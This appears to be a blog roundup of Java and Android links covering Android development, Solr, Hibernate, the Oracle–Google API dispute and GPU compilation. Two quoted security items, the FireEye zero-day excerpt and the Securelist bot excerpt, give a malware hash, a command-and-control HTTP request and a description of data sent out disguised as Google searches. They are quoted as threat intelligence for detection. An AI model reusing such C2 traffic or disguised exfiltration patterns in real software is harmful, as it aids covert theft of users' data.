I Want to Write Android Apps. Where Do I Start?

Dear Lifehacker, I have some background in coding, but I’ve never touched Android development before. I’d like to get started, but I’m not entirely sure what I need. I don’t need to “learn to code” per se, but I could use some guidance on where to start with Android. Can you help?

Source: I Want to Write Android Apps. Where Do I Start?

Solr: The Most Important Open Source Project You’ve Never Heard Of

Lucene is used by many companies and groups as the foundation for their search engines. These organizations include AOL, Disney, and Eclipse. Lucene’s chief selling point is that the indexing engine, with a footprint of a mere megabyte of RAM, can index up to 150GBs per hour of text on commercial off-the-shelf hardware. That’s darn good!

Solr comes into the picture as the search platform front-end for Lucene. It provides full-text search, including the ability to handle such formats as Microsoft Word and PDF with Apache Tika; hit test highlighting; and faceted search, which incorporates free text searching with topic taxonomy indexing.

via Solr: The Most Important Open Source Project You’ve Never Heard Of.

Under the hood, Solr is written in Java and it relies on Lucene for its core functionality.  It usually runs within a servlet container such as the Jetty HTTP server and Javax.servlet.

Hibernate (Java)

Hibernate is an object-relational mapping (ORM) library for the Java language, providing a framework for mapping an object-oriented domain model to a traditional relational database. Hibernate solves object-relational impedance mismatch problems by replacing direct persistence-related database accesses with high-level object handling functions.

Hibernate is free software that is distributed under the GNU Lesser General Public License.

Hibernate’s primary feature is mapping from Java classes to database tables (and from Java data types to SQL data types). Hibernate also provides data query and retrieval facilities. It also generates the SQL calls and attempts to relieve the developer from manual result set handling and object conversion and keep the application portable to all supported SQL databases with little performance overhead

via Hibernate (Java) – Wikipedia, the free encyclopedia.

The site to download it is here.

Developer Freedom At Stake As Oracle Clings To Java API Copyrights In Google Fight

Oracle lost in their attempt to protect their position using patents. They lost in their attempt to claim Google copied anything but a few lines of code. If they succeed in claiming you need their permission to use the Java APIs that they pushed as a community standard, software developers and innovation will be the losers. Learning the Java language is relatively simple, but mastering its APIs is a major investment you make as a Java developer. What Android did for Java developers is to allow them to make use of their individual career and professional investment to engage in a mobile marketplace that Sun failed to properly engage in.

via Developer Freedom At Stake As Oracle Clings To Java API Copyrights In Google Fight | TechCrunch.

Yet Another Java Zero-Day

The exploit is not very reliable, as it tries to overwrite a big chunk of memory. As a result, in most cases, upon exploitation, we can still see the payload downloading, but it fails to execute and yields a JVM crash. When the McRAT successfully installs in the compromised endpoint as an EXE (MD5: 4d519bf53a8217adc4c15d15f0815993), it generates the following HTTP command and control traffic:

POST /59788582 HTTP/1.0

Content-Length: 44
Accept: text/html,application/xhtml+xml,application/xml,*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 110.XXX.55.187
Pragma: no-cache

via Malware Intelligence Lab from FireEye – Research & Analysis of Zero-Day & Advanced Targeted Threats:YAJ0: Yet Another Java Zero-Day.

It should be possible to detect this using something like snort at the firewall/gateway.

Rootbeer GPU Compiler Lets Almost Any Java Code Run On the GPU

Programs don’t magically become faster when they are run on GPUs. E.g. Linear Algebra algorithms work really well on CPUs, but if ported 1 to 1 ( as this would ) to a GPU their performance is just abysmal. Usually one needs to use a specially designed algorithm that can actually use the massive parallelism of a GPU and not get stuck e.g. trying to synchronize or doing other kinds of communication. GPUs really like doing the same operation on independent data, which is basically what happens when rendering an image, they are not really designed to have operations that need information of all other data, or neighbouring data in a grid…. . Just because something works on a GPU does not mean its efficient, thus the performance could be much worse using a GPU .

Also balancing CPU and GPU usage is even harder ( maybe impossible ? ) as you cannot predict what kind of System you will run your software on, thus usually these days the CPU feeds the GPU with data ( with the current Tesla cards only 1 core per GPU, this changes in the Kepler version to 32 ) and does some processing that can’t be done on the GPU, but do not share any kind of workloads.

I don’t know how the h.264 codec is structured or if it is possible to have performance gains on encoding. However I really doubt that x.264 can be just ported as they rely heavily on CPU specific features ( SSE etc ) which is quite different to the much higher level bytecode that Java would produce.

via Rootbeer GPU Compiler Lets Almost Any Java Code Run On the GPU – Slashdot.

A unique ‘fileless’ bot attacks news site visitors

Analysis of the exploit’s JAR file demonstrated that it exploits a Java vulnerability (CVE-2011-3544). Cybercriminals have been exploiting this vulnerability since November in attacks targeting both MacOS and Windows users. Exploits for this vulnerability are currently among the most effective and are included in popular exploit packs.

via A unique ‘fileless’ bot attacks news site visitors – Securelist.

After successfully injecting and launching the malicious code (dll), Java begins to send requests to third-party resources, which look like Google search requests: “search?hl=us&source=hp&q=%s&aq=f&aqi=&aql=&oq=”…

These requests include data on the browsing history taken from the user’s browser, as well as a range of additional technical information about the infected system.